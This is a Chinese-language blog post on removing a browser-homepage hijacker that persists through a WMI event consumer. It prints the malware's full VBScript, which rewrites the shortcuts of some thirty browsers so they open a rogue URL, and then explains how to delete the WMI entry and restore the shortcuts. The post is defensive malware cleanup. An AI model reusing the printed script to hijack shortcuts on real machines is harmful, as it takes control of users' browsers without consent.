先放一個知乎帖子: https://www.zhihu.com/question/21883209
我就只放幾個有效解決辦法了,具體的可以看上邊那個帖子
方案一: 刪掉桌面上的chrome圖標,打開安裝文件夾找到chrome.exe,隨便改成什么名字.exe,重新發送到桌面快捷方式,讓惡意程序找不到chrome.exe
方案二: 可以看我之前寫的一個帖子,一些比較實用的技巧 http://www.cnblogs.com/tanrong/p/7627002.html
但其實上面的辦法都治標不治本,並且千萬不要下載什么 這管家那管家的,以毒攻毒嗎
還有就是:國外的一個解決辦法,比較徹底,看一下這個 https://malwaretips.com/blogs/remove-hao123-virus/#junkware
補充一種推薦的方案:
參考的這位大哥 - https://jing-luo.github.io/2017/03/DefeatYourBrowser/(別告我侵權)
以下內容基本照搬
主頁被劫持的原理是一段通過WMI發起的定時自動運行腳本,WMI(Windows Management Instrumentation)可以理解成Windows系統后台運行的一個事件管理器。為查看WMI事件,先去下載WMITools並安裝:WMI工具 WMI工具。
之后打開WMI Event Viewer:
點擊左上角的筆的圖標(Register For Events),在彈出的Connect to namespace的框直接點OK,Login的頁面也直接點OK。點開左側欄的EventFilter,再點擊下級目錄的項目:
在右側欄右鍵點擊ActiveScriptEventConsumer,並通過view instant properties查看屬性:
在Script Text那一欄我們可以看到這段腳本:
On Error Resume Next Const link = "http://hao.qquu8.com/?m=yx&r=j" Const link360 = "http://hao.qquu8.com/?m=yx&r=j&s=3" browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe" lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\sjtul\Desktop,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\sjtul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" browsersArr = split(browsers,",") Set oDic = CreateObject("scripting.dictionary") For Each browser In browsersArr oDic.Add LCase(browser), browser Next lnkpathsArr = split(lnkpaths,",") Set oFolders = CreateObject("scripting.dictionary") For Each lnkpath In lnkpathsArr oFolders.Add lnkpath, lnkpath Next Set fso = CreateObject("Scripting.Filesystemobject") Set WshShell = CreateObject("Wscript.Shell") For Each oFolder In oFolders If fso.FolderExists(oFolder) Then For Each file In fso.GetFolder(oFolder).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then Set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If oDic.Exists(LCase(name)) Then If LCase(name) = LCase("360se.exe") Then oDicShellLink.Arguments = link360 Else oShellLink.Arguments = link End If If file.Attributes And 1 Then fsoile.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next End If Next
可以看到這是一段VBScript代碼,攻擊目標涵蓋了包括Chrome、360、Firefox、搜狗等30余種常見的瀏覽器。腳本以瀏覽器的安裝地址為切入點,創建WshShell對象,進而生成植入了流氓網站的快捷方式。360瀏覽器有限定主頁格式,於是這段腳本還特地修飾了流氓網站的鏈接。
解決辦法就是清除這段腳本:
直接在WMI Event Viewer中將_EventFilter.Name=”VBScriptKLive_filter”右鍵刪掉會被系統拒絕掉
需要去WMI Event Viewer的安裝位置,右鍵以管理員方式運行exe文件才能刪掉。
(
之后還要把各個快捷方式都改回不帶流氓網站的版本,包括桌面上的、開始菜單里的以及快速訪問欄里的快捷方式,其中開始菜單里的快捷方式要去C:\ProgramData\Microsoft\Windows\Start Menu\Programs里改掉。
參考我的另一個博客: http://www.cnblogs.com/tanrong/p/7627002.html
)